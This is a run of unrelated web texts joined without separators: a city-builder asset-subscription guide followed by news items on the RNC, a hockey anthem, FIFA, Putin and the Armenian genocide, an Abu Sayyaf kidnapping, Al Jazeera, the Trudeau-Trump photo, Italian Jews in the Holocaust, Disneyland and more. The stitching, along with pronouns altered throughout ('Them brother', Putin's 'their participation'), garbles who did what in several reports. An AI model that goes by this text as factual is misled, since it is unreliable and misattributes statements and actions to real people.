Customize Subscriptions - This method allows you to customize your growable assets based on the type of city you're building and how you want your city to look. It will take a little longer, but you should end up with the best results using this method. You will need to navigate to each sub-collection for each building size and choose a variety of assets that you like for each building type/level/size. I would probably recommend somewhere between 5 and 10 building assets for each type/level/size. Of course the more you add, the more variety you'll get, but you might experience longer load times and memory issues if you go too crazy.
If you see a building you don't like in the game, simply figure out what type/level/size it is, and then you can easily find it in the Asset Manager to unsubscribe from it.
If you see a building that is showing up too many times, figure out what type/level/size it is, located in in the Asset Manager, and then add some more assets with the same type/level/size.
Modders, it would be very helpful if you included basic information about your assets, including
- Building Level (L1, L2, etc.)
- Building Density (LD, HD)
- Building footprint (2x3, 1x1, etc)
- Screenshot
- Also, please test your asset out by loading in the game using the Asset Editor to make sure there are no errors. It's amazing how many assets are uploaded to the workshop which contain errors.
- ALSO, PLEASE GIVE YOUR ASSETS UNIQUE NAMES!!!! ADD 3 or 4 RANDOM LETTERS TO THE END IF YOU MUST. If you use a generic name, we get errors because someone else has probably used that same name.
I'm still adding more buildings to these collections as I have time. If there are any issues with a building, please report it in the comments and I will remove it from the collection.
Please add this to your favorites and upvote to help spread the word.
Last updated - 4/8
The Republican National Committee has just passed a compromise measure on a key set of resolutions that were being offered at today's winter meeting. It would require Republican candidates to pass ideological muster in order to receive party funding.
RNC committee member James Bopp, Jr., had previously offered two resolutions. The more controversial one — commonly dubbed the “purity resolution” in the media, and opposed by RNC Chairman Michael Steele — would have forbidden RNC funding for candidates who don't show they match up with conservative positions on eight out of ten key issues. A second resolution, which Bopp called the “accountability” resolution, would have specifically empowered the RNC chairperson to consider ideology in apportioning funds to candidates.The new compromise measure is functionally similar to the accountability resolution. Bopp explained to me earlier this afternoon that the key difference is that their resolution was phrased negatively, in terms of denying funds to insufficiently conservative candidates, while the new one is phrased in positive terms of holding to the platform. It calls upon Republican leaders — a broad category that Bopp says includes the RNC, state parties and other committees — to ensure that a candidate is faithful to the Republican Party's beliefs, as expressed in the platform.
“It passed unanimously in the [resolutions] committee,” Bopp said this afternoon. “And if it passes on the floor today as I expect, then I will withdraw my resolutions.”
The issue became very relevant recently during the NY-23 special election, when Steele continued to support moderate Republican nominee Dede Scozzafava, and not Conservative Party candidate Doug Hoffman, right up until Scozzafava dropped out of the race (and subsequently endorsed Democrat Bill Owens, who won the election). Steele insisted that their job as RNC chairperson is to support all Republican nominees, and not to cast judgment upon which are more or less ideologically deserving of support.
“Well, the discussion I had with them [Steele], the most recent discussion, was in the wake of that, because I knew their view, and they were being criticized,” said Bopp. “And I thought that criticism was unjust, because that's the way they view their job. And that means it's something the RNC needs to deal with. If their job description is going to be to support all candidates, that's one thing. But if it's to take candidate ideology into account, the job description is written by the RNC.”
Bopp said that Steele's view of their job was a “quite reasonable belief, that their job description did not include considering ideology at all. And now we will change that with the adoption of this resolution.  They are to consider that. And that'll serve to avoid these problems with these party switchers. Chafee and Dede and Specter, giving millions of dollars to support the election of people who don't agree with us.”
Hamilton
Walk Off the Earth gets grief for World Cup anthem
Share on Facebook Share on Twitter Share by Email
Juno-winning band sang 'in all of us command' instead of 'in all thy sons command'
At the World Cup of Hockey final last night, Walk Off the Earth learned that when you break out a ukulele and a melodica to perform O Canada, there will definitely be whinging.
ADVERTISEMENT
The Burlington, Ont. band performed the national anthem before the second game of the final between team Canada and team Europe.
It could be best described as an unconventional rendition, bringing the Juno award-winning band's indie pop style to an anthem that is usually reserved and ceremonial.
Here's what Montreal Canadiens goaltender Carey Price looked like while they performed:
The band also sang "in all of us command" instead of "in all thy sons command," embracing Mauril Belanger's private member's bill that passed this summer, which would make the anthem more gender neutral.
The Liberal MP died of ALS in August. The bill passed by a vote of 225 to 74, but still needs to go to the Senate.
Predictably, some on the internet were not amused, and the band took to Twitter to defend itself.
Others simply disliked the stylistic choices.
Many, though, backed up the band.
In the end, Canada continued its dominance at the international level for hockey, topping Europe 2-1 in the dying minutes of the game on a shorthanded goal from Brad Marchand — and really, that's all that matters.
adam.carter@cbc.ca
Should Sepp Blatter not heed calls to step down in the wake of the ‘World Cup of Fraud', India's vote in the Fifa presidential elections in Zurich on Friday will likely go to him.
A day after an FBI probe into corruption led to the arrest of seven top football officials and prompted a Swiss investigation into bids for the 2018 and 2022 World Cups, an India Football Federation (AIFF) official said most of Fifa's 209 members were likely to vote Blatter to a fifth term as president.
The Asian Football Confed-eration also backed Blatter in a statement: “The AFC reiterates its decision taken at the AFC congress in São Paulo in 2014, endorsed at congresses in Melbourne and Manama in 2015, to support Fifa president Joseph S Blatter.”
This despite European football chief Michel Platini saying a “very, very, very large majority” of the 54 European nations would back Prince Ali bin al Hussein of Jordan, the Fifa vice-president who is the only challenger to Blatter.
While predicting elections can be dodgy, for India, Blatter's art of giving is likely to matter more than the allegations of corruption. All member associations got $750,000 (around Rs 4.8 crore) as a percentage of profits from the 2014 World Cup. This was started in 2006 under Blatter's reign and the amount went up significantly last year — unconfirmed reports said it was less than $500,000 (Rs 3.1 crore) in 2006 and 2010.
This is over and above the annual grant of $250,000 (Rs 1.5 crore) each country gets. This year, $300,000 (Rs 1.9 crore) will also be given to countries participating in the qualifiers for the 2018 World Cup in Russia. India's campaign starts in Bangalore against Oman on June 11.
Under Blatter, Fifa's cash reserves have grown to $1.5 billion (Rs 9,572 crore).
For India, there's more. It's got the 2017 under-17 World Cup, an event Fifa hopes will kickstart a football revolution in India.
Then there's the Win In India With India programme, started in 2010 and ending this year, that gave India eight artificial pitches and Mumbai's Cooperage Ground a refurbished stadium with lights.
It was under the Fifa Goal Project that AIFF's headquarters in Dwarka and the offices of the Sikkim football association were built. The Goal Project also supports AIFF's academy in Goa. A programme to support development in six-seven states, the ones that will host the under-17 tournament in 2017, is scheduled to roll out soon.
So, while there's nothing official about India's stand, it is unlikely to be against the official candidate.
First Published: May 29, 2015 00:26 IST
Russian President Vladimir Putin has described the 1915 Armenian massacres in Ottoman Turkey as genocide ahead of their participation in Friday's official ceremonies in Yerevan to mark the 100th anniversary of the tragedy.
“April 24, 1915 is a sad date connected with one of the most appalling and dramatic events in the history of humankind: the genocide of the Armenian people,” Putin said Wednesday in a written message to participants of an event in Moscow dedicated to the genocide centennial.
“One century on, we bow our heads in memory of all victims of this tragedy which our country has always perceived as its own pain and calamity,” they said.
“The position of Russia has been and remains objective and consistent: there can be no justifications for an ethnically motivated mass extermination. The international community is obliged to do everything to ensure that such atrocities are never repeated anywhere.”
“New generations of Armenians and other peoples of the region must live in peace and accord without knowing the horrors that result from provocation of religious enmity, aggressive nationalism and xenophobia,” added the message posted on the Kremlin's website.
Putin is one of the four foreign heads of state -- along with the presidents of France, Serbia and Cyprus -- who have accepted official Armenian invitations to take part in the April 24 remembrance ceremonies in Yerevan. Russia and France are among two dozen countries that have officially recognized the World War One-era slaughter of some 1.5 million Armenians as genocide.
In what may have been an attempt to prevent Putin's April 24 visit to Armenia, Turkish President Recep Tayyip Erdoğan phoned their Russian counterpart and discussed the genocide issue with them on March 17. Erdoğan told Putin that the issue should be tackled from a “fair perspective.”
The Moscow event saluted by Putin was organized by the pro-Kremlin Union of Armenians of Russia (SAR) with what the latter described as the “support” of the Russian presidential administration and other government bodies.
Wednesday, Nov. 11, is Veterans Day – a day to honor those who have served and are serving in the United States military. On Veterans Day, we give thanks to those who serve and sacrificed their lives to ensure our freedom.Sprint has a long history of supporting veterans through internal programs and hiring processes. Sprint's military recruitment program focuses on hiring veterans, members of the Reserve and National Guard, and helping active military and their spouses or other family members with the transition to civilian life. The Veteran Employee Resource group (VETS) is a member-based community within Sprint that focuses on the veteran experience for both employees and community. The group has more than 800 active members in 38 states.Sprint's VETS ERG members include formerly active duty and reserve members from every branch of service and employees who have not served in the military but are interested in veteran issues and/or supporting the military. Members of the VETS ERG help drive profitability in part through using their military expertise to ensure that military-focused marketing strategies hit the mark. Members actively volunteer for local community veteran events across the country.Sprint provides a special discount on service to those who serve. Veterans and active military personnel get 15 percent off select data rate plans (applies to new and existing customers).For example, a family of four can share 10GB of data for $85 per month (regularly $100 per month). Customers simply need to provide their military/DOD ID or other proof of service to receive their military discount when visiting a Sprint store. Visit www.sprint.com/save to find out more about the Sprint Discount Program.Our commitment to hiring military veterans and offering great benefits for military employees and their families has received widespread recognition. G.I. Jobs recently named Sprint to its Military Friendly Employer list for the tenth year in a row. And 2015 marks the seventh year that Civilian Jobs has named Sprint a Most Valuable Employer for Military.
NEW YORK -- Scandal-tarred former member of congress Anthony Weiner has a new job as a part-time public relations consultant.
The firm MWW announced Thursday that Weiner will join its board of advisers. The company said Weiner will be a consultant on public policy and new business development and will not service clients directly.
Weiner admits to more "sexting" after Congress
Weiner represented a Brooklyn and Queens district in Congress until they resigned over sexually explicit texts and social media posts in 2011. They unsuccessfully ran for mayor of New York City in 2005 and 2013.
MWW is based in East Rutherford, New Jersey. Its clients include Netflix, Southern Comfort and Samsung.
The firm's founder, Michael Kempner, was a national finance co-chairperson for Hillary Rodham Clinton's 2008 presidential campaign.
Weiner's wife, Huma Abedin, is a longtime Clinton aide.
An endangered species of Madagascan lemur uses the alarm calls of birds and other lemurs to warn it of the presence of predators, a new study by researchers from the University of Bristol and Bristol Zoo with the University of Torino has found. This is the first time this phenomenon has been observed in a solitary and nocturnal lemur species.
Very little is known about the Sahamalaza sportive lemur (Lepilemur sahamalazensis), other than the fact it roosts during the day in rather open situations, such as tree holes, and therefore risks falling victim to predators from both the air and the ground.
Sportive lemurs are not kept in any zoo. Prior to this research virtually nothing was known about this particular species despite the fact that it has been classified as Critically Endangered, the top threat category of the International Union for Conservation of Nature's (IUCN) Red List of Threatened Species, at a red-listing workshop in Madagascar in July 2012.
Dr Melanie Seiler, a researcher at Bristol Zoo and the University of Bristol, and lead author of the study, said: "We were seeking any information we could gather that could help us understand this species better, with the objective of improving targeted conservation efforts.
"One of the problems of small nocturnal species is that they don't get a great deal of scientific or conservation attention. The Sahamalaza sportive lemur doesn't have striking blue eyes like blue-eyed black lemurs or any other unusual features. That means that no-one had really looked into what these animals need to survive."
Dr Marc Holderied of the University of Bristol said: "Until our study, a solitary and nocturnal lemur species had never been tested to see if it could understand other species' alarm calls and differentiate between them. We were also the first to test any species of lemur to see if it could recognise the alarm calls of a non-primate species."
The researchers found that the vigilance of sportive lemurs significantly increased after they heard playbacks of the alarm calls of the crested coua and the Madagascar magpie-robin. They also responded with increased vigilance to the aerial alarm calls of the blue-eyed black lemur, scanning towards the sky but never the ground which suggests they classified the alarm call correctly.
Dr Holderied said: "Our results indicate that the Sahamalaza sportive lemur is capable of gleaning information on predator presence and predator type from the referential signals of different surrounding species. Examples for cross-species semantics in lemurs are rare, and this is the first record of lemurs using information across vertebrate classes."
The lemurs of Sahamalaza National Park in northwest Madagascar are threatened by deforestation, hunting and forest fragmentation. Bristol Zoo is working to preserve the small bits of forest, roughly 200 hectares on the Sahamalaza Peninsula, that they have left which is vitally important for the continued survival of this and other lemur species.
Paper
'Interspecific semantic alarm call recognition in the solitary Sahamalaza sportive lemur, Lepilemur sahamalazensis' by Melanie Seiler, Christoph Schwitzer, Marco Gamba and Marc Holderied in PLoS ONE
The sessions this week at Red Bull Arena — there were also closed-door tests on Tuesday — produced the mixed results that the rules officials and former referees looking on had expected. Some decisions in Wednesday's session with the youth players were raised and resolved in less than 30 seconds, and without the referee, Ismail Elfath, ever leaving the field.
Others took longer, and sometimes required Elfath to run to the sideline to quickly review several angles of a specific incident on a large electronic tablet. In each case, they had a brief discussion with the video referee upstairs through their headset, and then either affirmed or overturned their decision on the field.
However, in every case Elfath retained the final say on the call. Only the match referee can initiate a formal review of an incident under current protocols, Elleray stressed, and only the video referee can recommend one.
“The referee could say, ‘No, I've seen everything clearly; we don't need to check it on the television,'” Elleray said.
There will be no coaches' challenges in the replay rules — according to the rules board, players and coaches interviewed strongly opposed them for fear they would be used for gamesmanship or to bring about intentional breaks in play — and for now there is also no time limit on how long a review should take.
The officials also warned fans that they should not expect to see video replay in use anytime soon; the board will not experiment with competitive matches until 2017, although Major League Soccer's vice president for competition, Todd Durbin, said Wednesday that the league was eager to get started. M.L.S. has been running its own replay experiments for several years.
Even in two days of trials this week, Elleray and others said that they could see progress. Delays with review calls had grown shorter, and the communication between the referees and the video referees had improved, they said.
“The body language of the referees was clearer” on Wednesday, Elleray said. “They made it much more clear for everybody when something was being reviewed. So there was a significant improvement we saw, which I think shows the benefit of the education, particularly in the early stages.”
Philippine navy personnel stand onboard the yatch Rockall, where the body of a naked white woman who had been shot was found aboard, after it was in Sulu province
Islamic militants who specialise in kidnapping for ransom have reported killing a German sailor and abducting their elderly male companion from their yacht off the southern Philippines, the military said Monday.
A commander from the Abu Sayyaf group, which has earned millions of dollars by kidnapping foreigners and killed others after ransom demands were not met, claimed responsibility for the latest incidents, regional military spokesperson Filemon Tan told AFP.
It appeared the victims were the same as those abducted by Somali pirates off the Gulf of Aden and held hostage for 52 days in 2008. The husband and wife were released at that time after a ransom was paid.
Tan said the military had recovered the couple's yacht, named the Rockall, and the body of a naked white woman who had been shot was aboard.
They said the military had listened to an audio recording of a known Abu Sayyaf leader claiming responsibility for the raid on the yacht, and the abducted German man also spoke on the phone call.
The abducted man identified themselves as Jurgen Kantner, aged 70, and their companion as Sabine, according to Tan.
Tan said the passports of Kantner and Sabine Merz were found on the Rockall.
They said the photo in Merz's passport appeared to match the body of the dead woman aboard, although their identity still needed to be confirmed.
In Berlin the German government said it had yet to verify the media reports.
"We are trying right now together with Filipino authorities to determine (what happened)," foreign ministry spokesperson Martin Schafer told reporters.
"We have to see what the facts are, to see if what the media are saying is actually true."
AFP interviewed Kantner in 2009 about being kidnapped along with Merz, identified then as their wife, by Somali pirates. They were subjected to a mock execution during the ordeal.
Speaking from Somalia where they had returned to retrieve their boat, Kantner said the threat of another kidnapping would not stop them from sailing.
"My boat is my life and I don't want to lose her, nothing more. I don't care about pirates and governments," Kantner told AFP from Berbera.
Kantner said then that they could not afford another kidnapping, after the ransom was paid to the Somali pirates.
"I really hope the pirates don't catch me because this time no one will pay and everybody will tell the pirates: 'Keep him'," they said.
- Growing threat -
The Abu Sayyaf, a loose network of militants based on remote islands in the southern Philippines, has defied more than a decade of US-backed military offensives and has been on a lucrative kidnapping spree in recent years.
In 2014 the militants abducted another German couple off a yacht in the southern Philippines. They released the pair six months later after receiving what they said was the full ransom demand of 250 million pesos ($5.1 million).
The Abu Sayyaf beheaded two Canadian men this year after demands for millions of dollars were not met.
The Abu Sayyaf is also blamed for kidnapping dozens of Indonesian and Malaysian sailors off the southern Philippines near where the Rockall was raided.
Most of those sailors were released after ransoms were reportedly paid.
However some are still being held and another two Indonesian fishermen were abducted off Malaysia's eastern state of Sabah at the weekend.
The Philippine military launched an offensive against the Abu Sayyaf after President Rodrigo Duterte vowed in August to eliminate the group.
But the Abu Sayyaf has continued to carry out raids apparently without hindrance, with the poorly equipped troops unable to secure the remote and mountainous southern islands or surrounding waters.
Foreigners typically stay away from that area because of the kidnapping threat.
However Islamic militants are also planning to kidnap foreigners in tourist hotspots of the central Philippines, the US government warned last week.
Photo via ToastyKen
7-Eleven Japanis planning to switch all of its new convenient stores with LED signboards and outdoor lighting in order to do its part to reduce GHG emissions. The energy-savvy effort is expected to help the chain reduce its carbon dioxide emissions by 3%. That doesn't sound like a whole heck of a lot, but when we consider the number of 7-11s that will have this reduction, it adds up quickly.
Switching to LEDs should save about 1.8 tons of carbon dioxide per store per year, with about 1,000 new stores opening each year. A question I ponder is where the heck 1,000 new stores each year are going to fit!
At any rate, the effort shows real dedication on the part of the company, which will spend over $1 billion a year for the conversion. Yet the savings will be worth it as the lights will use about 75% less energy than fluorescents.
With lights at convenience stores turned on usually 24-7, a switch to LEDs is a smart move. Other convenience stores will probably follow suit after they see what kind of savings 7-11 reaps.
Via GreenPacks
More on the Switch to LEDs
Office Building Lit By 100% LED Light
Weird Looking LED Bulbs Hitting US Market
Photo by PYMCA / Getty Images
Update 6:20 p.m.: The stream has ended, but is currently replaying—watch it below. Find all of the information about the album here.
---
At last: the new Kanye West album is upon us. Following a seemingly endless cycle of title changes (first So Help Me God, then SWISH, then Waves, and then, just last night, The Life of Pablo), controversies, and pre-release tracks ("Only One," "All Day," "Wolves," "Fade," "FACTS," "Real Friends," "No More Parties in L.A."), the day has finally arrived when we all get to hear the follow-up to Yeezus.
Kanye is debuting The Life of Pablo at an event at Madison Square Garden this afternoon. The event is being streamed live to theaters around the world, as well as broadcast on TIDAL. It features a performance from conceptual artist Vanessa Beecroft, as well as the launch of Kanye's new fashion line, Yeezy Season 3.
(Problems with the stream are being reported, but it seems to load when the resolution is lowered to 240kbps.)
Follow along on Pitchfork's Snapchat.
Watch it below:.
Read "Inside the Kanye West Think Tank" on the Pitch.
Update 5:38pm: Following the album launch, Kanye played new tracks by Young Thug and Vic Mensa, previewed a video game about their mother ascending to heaven, called "Only One: The Game."
Here's what it looks like from inside Madison Square Garden, right before the event begins:
...And it's begun:
Saudi Arabia and its allies have demanded the closure of Qatar-based broadcaster Al-Jazeera
ADVERTISING Read more
Geneva (AFP)
The UN voiced outrage Friday at the demand from Gulf countries that Qatar-based broadcaster Al-Jazeera shut down, describing it as "an unacceptable attack on the right to freedom of expression and opinion."
The closure of the broadcaster is one of 13 wide-ranging demands placed on Doha by Saudi Arabia and its allies as the price for lifting an almost month-long "blockade" on Qatar.
The four countries have given Qatar a 10-day deadline for implementation ending on July 4.
UN rights chief Zeid Ra'ad Al Hussein "is extremely concerned by the demand that Qatar close down the Al Jazeera network, as well as other affiliated media outlets," their spokesperson Rupert Colville told reporters.
"Whether or not you watch it, like it, or agree with its editorial standpoints, Al Jazeera's Arabic and English channels are legitimate, and have many millions of viewers," they said.
"The demand that they be summarily closed down is, in our view, an unacceptable attack on the right to freedom of expression and opinion."
Colville stressed that countries that take issue with items broadcast on other countries' television channels, "are at liberty to publicly debate and dispute them."
"To insist that such channels be shut down is extraordinary, unprecedented and clearly unreasonable," they said.
They warned that if Qatar goes ahead and shutters Al-Jazeera, "it would open a Pandora's Box of powerful individual states or groups of states seriously undermining the right to freedom of expression and opinion in other states, as well as in their own."
With the support of the United Arab Emirates, Egypt and Bahrain, the Saudis announced on June 5 they were suspending all ties with Qatar, accusing it of support for extremist groups -- a claim Doha denies.
They closed their airspace to Qatari carriers and blocked the emirate's only land border, a vital route for its food imports. They also ordered all Qataris to leave and their own nationals to return home.
And after Riyadh last week laid down its list of 13 demands for Qatar, the UAE warned the country should take them seriously or face "divorce" from its Gulf neighbours.
Zeid is urging "all five states to take measures to solve this dispute in a calm, reasonable and lawful manner," Colville said, adding the countries should "ensure that any actions they take do not impact on the human rights of their own and other countries? citizens and residents."
© 2017 AFP
Chelsea's January signing Matt Miazga pulled on the blue shirt for the first time on Friday night as the Under 21 beat Leicester 2-1.
The US centre-back has not made a competitive appearance since November due to the end of the season in America, but has been building their fitness at the club's Cobham training ground.
The 20-year-old signed a four-and-a-half-year deal at the Premier League champions at the end of the transfer windows after two years at MLS side New York Red Bulls.
Matt Miazga finally made their Chelsea bow on Friday as the Under 21 beat Leicester 2-1 in Aldershot
The American centre back joined from New York Red Bulls in January but is yet to make a competitive start
The 20-year-old played the full 90 minutes as Chelsea stretched their unbeaten league run to six games
They finally made their Blues bow at Aldershot on Friday night as the Under 21 stretched their unbeaten league run to six games with victory over Leicester.
Miazga was first included in a Chelsea matchday squad in the Champions League first leg trip to PSG in February, but has yet to be thrown into the action by Guus Hiddink.
MATT MIAZGA FACTFILE AGE: 20 HEIGHT: 6FT 4IN POSITION: CENTRE-BACK SQUAD NUMBER: 20 FORMER CLUB: NEW YORK RED BULLS GAMES 42, GOALS 1
The American started in a back three alongside Dion Conroy and Jake Clarke-Salter, and they made a far from ideal start as Jon Dodoo fired the visitors ahead after 20 minutes.
Headed goals either side of half-time Clarke-Salter and Reece Mitchell ensured Adi Viveash's side took all three points.
Victory puts Chelsea fourth in the table, ahead of Everton by two points but trailing Manchester City by the same margin.
The American international has not played a competitive game since November due to end of MLS season
It is hard to imagine a better gift for Donald Trump than the one Prime Minister Justin Trudeau gave them during that recent White House visit: a framed photograph of Trump and Pierre Trudeau on stage together at the Waldorf-Astoria hotel in 1981. For Trump, who expertly played the politics of nostalgia in the presidential campaign — you know, making America great again — the photo captures them in a heady time for U.S. Republicans, and an era that many American voters might regard as really great in retrospect.
The photo that Prime Minister Justin Trudeau gave to President Donald Trump, showing Trump and Pierre Trudeau in 1981. ( Library and Archives of Canada )
In November 1981, Ronald Reagan's first term as president was well under way: he'd already lowered taxes by 25 per cent, held a famous showdown with air-traffic controllers and appointed Sandra Day O'Connor to the Supreme Court. The sunny Reagan had even survived an assassination attempt in March 1981. As for Pierre Trudeau, it was a pretty good time for the former prime minister, too. In fact, earlier on the very day that photograph was taken in New York on Nov. 5, 1981, Pierre Trudeau had signed a momentous deal with all provinces — except Quebec — to patriate the Canadian Constitution. Historians tend to describe this as a signature moment for Pierre Trudeau's time in power, for good and for bad. Many of those photographs Canadians have seen of the constitutional deal being reached — a smiling Pierre Trudeau, fingers in their belt loops, flanked by Jean Chrétien and other smiling cabinet ministers, for instance — were also snapped on Nov. 5, 1981.
Article Continued Below
In John English's definitive biography of Pierre Trudeau, titled Just Watch Me, events later in the day are described this way: “On the evening of November 5, while the anglophone premiers celebrated in Ottawa and René Lévesque returned, bitter and rejected to Quebec City, Pierre Trudeau flew to New York to accept the ‘Family of Man' award for ‘international excellence.'” English calls this night a turning point in Pierre Trudeau's career, and maybe in the history of Canada, too. “Trudeau's departure marked the end of their intense focus on the Constitution and the beginning of their concentration on international issues,” they write. I don't know whether Justin Trudeau or their staff were aware of the significance of the date and the occasion in the photo they dug up from the archives to give to the new U.S. president. I only stumbled across the coincidence while looking up what was going on in Canada and the United States roughly around the time the photograph was taken.
But it's kind of fun to imagine what Trudeau the father might have said if someone told them that night that the man at the podium would some day be president of the United States, and that Trudeau's own, the eldest son, then just about to turn 10 years old, would be the prime minister who had to deal with this Trump fellow. It's also worth noting that the photo captures a moment — the very day — when Trudeau the elder turned their attention from domestic to international matters; a fixation that came in their final years of being prime minister.
Article Continued Below
Justin Trudeau, their son, in contrast, has seemed to be focused on international matters, especially those in the United States, from the minute they walked into office. Not long after their swearing-in to office in November 2015, Trudeau was immediately jetting around the world to foreign summits and they spent their early months in power sealing their relationship with Barack Obama with repeat visits and dinners. For a while there last spring, it was almost easier to find Justin Trudeau in New York or Washington than it was in Ottawa. That's another big difference between the two Trudeaus (and there are many more.) In the midst of their current U.S. fixation, Justin Trudeau and their team have been looking for any and all ways to find common ground with the new Trump administration. They might want to add the politics of nostalgia to that list. Though Justin Trudeau came to power with the help of lots of young voters who weren't even alive when their father was in power, there is no question that some of their support also came from older Canadians, who wanted to make Canada great again — as great as they believed it was in the early 1980s when Pierre Trudeau was signing big constitutional deals. Political memories can be selective. Trump said he'd be keeping the 1981 photo in a special place. Perhaps Justin Trudeau is keeping a copy too — not just as a memento of a big day in their dad's life, but as a reminder that Trump and the Trudeaus, and political life itself, have moved in wildly unpredictable directions in the 35-plus years since the picture was snapped. Nostalgia's not what it used to be. sdelacourt@bell.net
Read more about:
Nissan has taken the covers of the livery Supercars full-time debutant Simona De Silvestro will campaign in the 2017 Virgin Australia Supercars Championship.
The Swiss driver will run a vivid red, black and white colour scheme on their #78 Altima Supercar featuring major backing from retailer Harvey Norman.
De Silvestro's Team Harvey Norman livery was shown in public for the first time at the Supercars season launch at the Adelaide Oval today.
The car will run one-off backing from SA Tourism at the Clipsal 500 Adelaide season opener from March 2-5.
“The car looks fantastic. Red goes faster, right?” said de Silvestro.
“It's great to show off the Altima I will be racing this year, as well as announcing that Harvey Norman will be supporting me.
“Harvey Norman was with me at the last two Bathurst 1000's, so it's great to have them onboard again.”
The 28-year-old Swiss driver has a decorated track record in open-wheel racing, recording a podium in IndyCar, and landing a testing role with the Sauber F1 Team.
De Silvestro has already jumped behind the wheel of the car after completing rookie day at Winton last week.
“Everyone has been really welcoming to me since I arrived, so I can't wait to get racing,” they added.
“We have started our testing program, and I'm feeling really comfortable in the car and with the team.
“This season will be challenging, as it's my first full year driving the Altima. But I have a great team around me, and I'm really looking forward to going racing at the Clipsal 500.”
De Silvestro will be in action again at the official test at Sydney Motorsport Park on February 21 ahead of the Clipsal 500.
During the darkest days of World War II, when much of Europe was under Nazi domination, Jews on the continent were imperiled: rounded up and murdered in concentration camps, under siege elsewhere, or on the run.
In the Italian village of Anghiari, another Catholic feast day approached. It was 1943 and an anxious moment for 7-year-old Adina Sella and their family, German-Jewish refugees living under the remarkable protection of Italian locals. Numerous people had taken significant risks for the family, creating cover stories, watching out for them and avoiding opportunities to report them — either to German authorities or their Italian Fascist partners.
And so Sella, born Peggy Schaufeld in Hamburg, Germany, became Lucia Scapelli of Anghiari, and their family became, under duress, students of Italian culture.
"The priest took it upon themselves on the eve of every Italian holiday or day of remembrance to tell us how to behave," Sella, now a 78-year-old Chicago psychologist, told us. "They used to come in the evening, 'Signore, signora, tomorrow is the Feast of St. Anthony, and on this feast you tie your kerchief this way, and give a donation there, hold your rosary like this … It was very, very important to blend in."
The history of World War II consists of many intertwined events — the tragic, the heroic and the overlooked, including the story of the Jews in Italy, most of whom escaped the Holocaust because many Italians shielded them from Hitler's genocidal vision.
While Italy under Benito Mussolini instituted harsh discrimination laws in 1938, Italian authorities opposed or subverted the Nazis' extermination plans while many Italians actively protected Jewish residents and refugees. Joseph Goebbels, the Nazi propaganda minister, complained in 1942 of the "lax" Italian attitude toward Jews. After the German occupation of Italy in 1943, several thousand Jews were sent to Auschwitz and other camps to die.
Why was a culture so humane and protective across the board as the Italians were, where cultures like the Germans committed the sadistic horrors they committed? — Edna Selan Epstein
Still, according to various estimates, about 80 percent of the roughly 45,000 Jews in Italy survived the war because Italy did not abandon them. Even when the Italians interned Jewish foreigners, families lived together under bearable conditions, the United States Holocaust Memorial Museum said.
"All my life, I've wondered, what is it about cultures?" Chicago attorney Edna Selan Epstein, who was born in Yugoslavia and survived with their family as refugees in Italy under false identities, told us. "Why was a culture so humane and protective across the board as the Italians were, where cultures like the Germans committed the sadistic horrors they committed?"
The question may not be answerable, but still it can be celebrated: On Monday, Chicago's 62nd annual Columbus Day Parade, operated by the Civic Committee of Italian Americans, will honor the victims, survivors and Italian heroes of the Holocaust.
In Israel, Yad Vashem, the Holocaust museum and memorial, lists more than 600 Italians as Righteous Among the Nations, those who risked their lives to save Jews. Among them are Giocondo and Annina Marconi, the villagers in Anghiari who took in Adina Sella's family. Them brother nominated the Marconis.
But many others also helped the family. When they arrived in Anghiari, they were desperate. They had been kept safe in their previous hiding place, the town of Arezzo, where Sella and their brother even went to a convent school. But then came a warning that the Germans were coming and the family could no longer be protected. They fled by train to the last stop on the line: Anghiari.
"Two police officers came — we were with another family — they grabbed the men and were gone," they recalled. "One hour, two hours, three hours … the women were besides themselves. We had no money. We didn't know what to do, where to go. Three hours later they came back, and they had false identities for us and ration books."
Sella's family eventually made it from Italy to Palestine (pre-independence Israel), and later they came to America with their husband.
Epstein's family survived and was in Rome for the American liberation in 1944. They arrived in the U.S. on a troop ship with wounded GIs and German POWs. They were interned in Oswego, N.Y., until after the war.
Both women spoke to us in anticipation of the Columbus Day parade in order to honor the Italians whose selfless acts of courage and decency deserve remembrance. We honor them, too.
As Media Matters for America has documented, a central facet of Fox News' position as the communications arm of the Republican Party is the presence of several potential GOP presidential candidates among the ranks of the network's employees.
Rick Santorum, Newt Gingrich, Mike Huckabee, and Sarah Palin are all Fox News employees -- and considering runs for office. They are all actively campaigning and raising money for GOP candidates and causes -- sometimes accomplishing the latter through their Fox News day jobs. Fox News is even willing and eager to cover them as they campaign, with no apparent regard for ethical questions.
Today, the Associated Press' David Bauder reports on how the network acts as a "town square" for Republican would-be presidential candidates and gives Fox "what may be a unique position of influence":
Three of the top five choices in the Southern Republican Leadership Conference's recent straw poll on favorite 2012 presidential candidates had more than one thing in common: They're all on the Fox News Channel payroll. Mike Huckabee hosts their own weekend show at Fox, Newt Gingrich gets frequent air time as an analyst and Sarah Palin is a celebrated recent hire. Mitt Romney, who won the informal sample, does not work for Fox. A Fox job certainly isn't a requirement for a Republican would-be president. Yet its stature as a town square for opponents of the Obama administration places Fox in what may be a unique position of influence for a television network. "Fox has almost replaced the Heritage Foundation and AEI (American Enterprise Institute) as the White House in waiting for the Republican Party," said Eric Burns, president of Media Matters for America, a liberal media watchdog.
Read the whole thing.
UPDATE 7/16/14: Tickets are now on sale to Disneyland Resort Annual Passholders, Disney Rewards Visa cardholders and Disney Vacation Club members here.
The Happiest Place on Earth is about to get spookier again, when Halloween Time at the Disneyland Resort returns September 12 through October 31. And there will be even more thrills and chills with 14 nights of Mickey's Halloween Party at Disneyland park!
Halloween Time features the popular seasonal attractions, Haunted Mansion Holiday and Space Mountain Ghost Galaxy, along with some famous Disney Villains, Mickey Mouse and their friends in Halloween costumes, the Dia de los Muertos celebration and the special after-hours Mickey's Halloween Party (a separate, ticketed event).
You can purchase your Mickey's Halloween Party tickets early – and on your mobile device – here. Be sure to mark your calendars for the following dates:
July 16: Tickets on sale to Disneyland Resort Annual Passholders, Disney Rewards Visa cardholders and Disney Vacation Club members
Tickets on sale to Disneyland Resort Annual Passholders, Disney Rewards Visa cardholders and Disney Vacation Club members July 30: Tickets on sale to general public
Tickets on sale to general public Mickey's Halloween Party 2014 dates: Friday, September 26; Tuesday, September 30; Friday, October 3; Monday, October 6, Wednesday, October 8; Friday, October 10; Tuesday, October 14; Friday, October 17; Monday, October 20; Wednesday, October 22; Friday, October 24; Monday, October 27; Wednesday, October 29; and Friday, October 31.
